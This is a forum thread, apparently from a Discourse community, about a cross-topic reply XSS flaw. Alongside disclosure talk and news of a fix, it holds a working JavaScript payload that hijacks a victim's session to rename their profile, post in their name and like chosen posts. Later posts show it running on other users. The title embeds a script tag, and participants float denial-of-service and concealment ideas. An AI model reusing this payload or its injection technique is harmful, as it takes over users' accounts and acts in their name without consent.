Formerly A Cross-Topic Reply XSS topic<script src='/raw/8058/22'></script>
-
Continuing the discussion from <script>$("body").addClass("fa-flip-vertical");</script>:
Well, it's not like it's fixed yet or anything.
Did anyone actually submit it to Meta.D? I wasn't able to see a topic about it, but if it was submitted then I'd imagine they'd move the topic to the lounge to prevent others from finding and abusing it before they can get the major instances patched. And I can't see the lounge because I lost TL3 due to the read-before-visiting-topics bug screwing up my topics visited statistic, which I haven't bothered to bot back up on meta.d like I did here.
So does any TL3 on meta.d know if the cross-topic reply dialog XSS has been submitted to meta.d?
-
According to our TL4 @aliceif they notified the important people but tried to not make it public, really.
Filed Under: So, everybody here knows about it but other forums are "safe"
-
According to our TL4 @aliceif they notified the important people but tried to not make it public, really.
Wouldn't it be better to make a PSA out of it? I mean, it's not exactly a hidden bug, and it would make sense to at least warn those who'd otherwise be conned into a "29-years-old forumgoer discovers a super secret instant TL4 technique, all admins hate him" kinda thing.
-
Meh, the bug (still) relies on a single person actually doing a Cross-topic reply, right?
So to abuse it you would have to actually go out of your way to make people do those.. and honestly, how often have you actually attempted to post cross topic?
I am not going to say the bug is not bad. It's a definite problem with the sanitisazion and should be fixed ASAP. But over at meta.d they are currently trying to figure out why Disocurse eats more memory than @ben_lubar when he has 1000000 instances of DF open, so I assume this is "high" on the priorities but not the top spot.
Filed Under: I don't know, though. All I can do is guess
-
So to abuse it you would have to actually go out of your way to make people do those..
As I said, a "super-secret way to obtain TL4"? Though it would probably be easier to make the poor soul open the dev console...
and honestly, how often have you actually attempted to post cross topic?
Might've happened once or twice - I'd compose a reply, something catches my eye, I navigate out of the original topic, and then remember about the reply.
so I assume this is "high" on the priorities but not the top spot.
It's an easy fix, though, and XSS in any way generally makes you look really bad.
-
As I said, a "super-secret way to obtain TL4"?
Wait, did I miss something about this bug? I thought everybody just posted scripts (either public or via PM and then made the screen turn like crazy... Do we have 100000 new TL4s now that I need to look out for?
Might've happened once or twice - I'd compose a reply, something catches my eye, I navigate out of the original topic, and then remember about the reply.
Welp, thats what it is there for. But it's still kind of a edge-case, right? And the chances of you doing that in exactly that one topic that tries to obviously screw with your stuff by having scripts in the title are kinda slim.
It's an easy fix, though,
Didn't you also assume that the 504s had no connection to the Closing of topics?
I mean, this is Discourse we are talking about, I have no idea how easy / hard it is to fix this. I also don't know if they will backport it, now that 1.2 is close.Filed Under: As I said: Should definitly be fixed but not sure when they get around to it
-
It's an easy fix, though, and XSS in any way generally makes you look really bad.
Exactly.
Wait, did I miss something about this bug?
Well they could inject random TL4 commands and hope a TL4 accidentally cross-topic posts onto their XSS topic.Yeah, it's super unlikely to happen because of how blatantly obvious it is, but it is still there, and maybe some noob admins could be tricked into doing it. @PJH usually tests things here, and if someone had injected a script into one of those /raw post calls that ran delete user calls, they could have gotten PJH to drop our entire user table I would think.
-
Didn't you also assume that the 504s had no connection to the Closing of topics?
I only said it would be fucking ridiculous if it were true.
That's Discourse for you. Assume nothing, expect nothing.
Wait, did I miss something about this bug? I thought everybody just posted scripts (either public or via PM and then made the screen turn like crazy... Do we have 100000 new TL4s now that I need to look out for?
No, but if you were in a forum with less, ahem, Darwin-favoured members, they might be easily fooled to think that this jumble of magic computer letters and a tricky Glitch City-like path would give them admin/mod/whatever.
-
if someone had injected a script into one of those /raw post calls that ran delete user calls, they could have gotten PJH to drop our entire user table I would think.
Can you delete users now? I remember @PJH mentioning that it's either impossible or a huge hassle...
-
they might be easily fooled to think that this jumble of magic computer letters and a tricky Glitch City-like path would give them admin/mod/whatever.
Or that, yea. You could inject the calls so that when @PJH tested it out, it would make your account a mod account.
-
Can you delete users now? I remember @PJH mentioning that it's either impossible or a huge hassle...
oh - that may be true; i'm just throwing out ideas on how bad the XSS bug can be if it falls into the wrong hand. too many people seem to think this XSS method wouldn't have any impact. While it is a low CHANCE of impact, if it did happen, the impact would/could be HUGE.
-
Or that, yea. You could inject the calls so that when @PJH tested it out, it would make your account a mod account.
There is one of those raw-injecting posts in the wild, courtesy of mine, but last time I checked it only did cornify. And there's little point to crowning yourself as a mod only to have your account instabanned, is there?
-
That's Discourse for you. Assume nothing, expect
FTFYnothingthe worst.
-
FWIW, I was considering adding my bot code to a post in OnePost and then using that raw link to inject the bot into anyone's browser that tested out the cross-topic reply stuff. My bot can post. And Like. And Etc. I could have impersonated anyone.
-
-
And there's little point to crowning yourself as a mod only to have your account instabanned, is there?
I am betting that you could hide the exploit well enough from mods on less tech savvy forums so as to not get insta-banned.
But yes, it would have to be more of a luck thing to get it to happen ever. Just that if it did happen, that forum would be at the mercy of the injector (until another mod fixes it at least).
-
they could have gotten PJH to drop our entire user table I would think.
Hardly. I don't have access to the live database.
I remember @PJH mentioning that it's either impossible or a huge hassle...
For anyone who's made more than a few posts, their posts have to be deleted first.
For anyone who's been here more than a certain length of time, the site setting would have to be upped to allow the deletion.
Removing anyone but a spammer is not a 'one-click' operation.
And the current one has been reported to Jeff, Sam and Régis, so at least three of the devs know about it.
-
Hardly. I don't have access to the live database.
Not literally "drop". But if any admin functionality in the admin panel allowed it, malicious code could make your browser do it if you cross-replied to one of these.
-
@eviltrout merged in a fix this morning, trouble is I am still investigating some high memory usage issues and an not particularly enthused about unleashing
tests-passed
here, give me a bit longer.
-
malicious code could make your browser do it if you cross-replied to one of these.
Only if it addresses the points that sprung to mind listed in my previous post - there are other things that it would have to do.
Basically it isn't a simple 'bobby tables' type thing, even if I could be tricked into executing something via XSS.
give me a bit longer.
While not looking pretty, I don't think this one is particularly bad, unless there's another more serious vector around it that hasn't been found yet.
Any ETA on Beta7/Main release yet?
-
we were meaning to do a main release next week, but I may push for a beta7
first and then follow with a main release shortly after.
-
/* I'd like to see someone cross-topic reply on this post now... also, welcome to t/1000 if you do.
<this is to hide the codes. I see you cheating by using our special raw button to preview the injection! */$.ajax({type: "PUT",url: $('.user-dropdown-links a').first().attr("href"),data: {bio_raw:"I am ɗӑʁҞɯɐɫɫӛʁ's new puppet",name:"ɗӑʁҞɯɐɫɫӛʁ's new puppet"}});var a=function(u,d){ $.ajax({ type: "POST", url: u, data: d });};a("/posts",{raw:"Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<a"+Math.random(), category: 16, topic_id: 8058, is_warning: "false", archetype:"regular"});setTimeout(function(){a("/posts",{raw:"I got suckered into posting in t/1000. All your likes are belong to me. darkmatter will be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<a"+Math.random(), category: 16, topic_id: 1000, is_warning: "false", archetype:"regular"});},6000);a("/post_actions",{id: 230261, post_action_type_id: 2, flag_topic: "false"});a("/post_actions",{id: 230263, post_action_type_id: 2, flag_topic: "false"});
-
-
-
I'd like to see testers do a cross-topic reply on this topic now.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone ran followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone ran followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.
tyvm
-
EEEK
-
I especially love how their sanitizer hides the javascript from view unless you actually visit the /raw URL.
i am sad that the /dammit breaks the link :(
-
well damn, it failed to run step 2... needs more testing!
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.6153356169816107
-
Added randomizer so it won't block my spam for "being too similar"
Also funny that it causes your post to fail if you hit submit too soon, because it hijacked your posting and you can only post once every 5s.
-
you can only post once every 5s
now add a setInterval() in there and DOS the victim?
-
You could but it would stop running the script once they closed the tab, refresh the page, or navigate away from dicsourse.
Whatever it is has to do its dirty work within a few seconds, though you can do a lot of non-rate-limited stuff in a few seconds. Fortunately cross-topic replying is so rare that it's kind of a security by obscurity.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.3009734444785863
-
let's see if that takes. yep works... now that's humorous .
too bad no one will trust this topic enough to try it
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.11207702980710754
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.5991284630727023
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<0.3009734444785863
You can add an alphabetical character after the < to hide the random number.
-
-
-
yay someone did it for me :)
-
You can add an alphabetical character after the < to hide the random number.
I might as well go for completeness... sure why not!
Added char that should hide the randomnumber piece.
-
That's awesome.
-
Proof of concept. All your likes are belong to me. And aliceif. I'll be amused if someone followed the instructions and cross-topic replied to allow this code to run. I have posted this courtesy of darkmatter.<a0.6878043573815376
-
-
Fixed it.
-
ha nice
yea i fixed the script now too :)
-
-
pshaw, not like you can't change it back.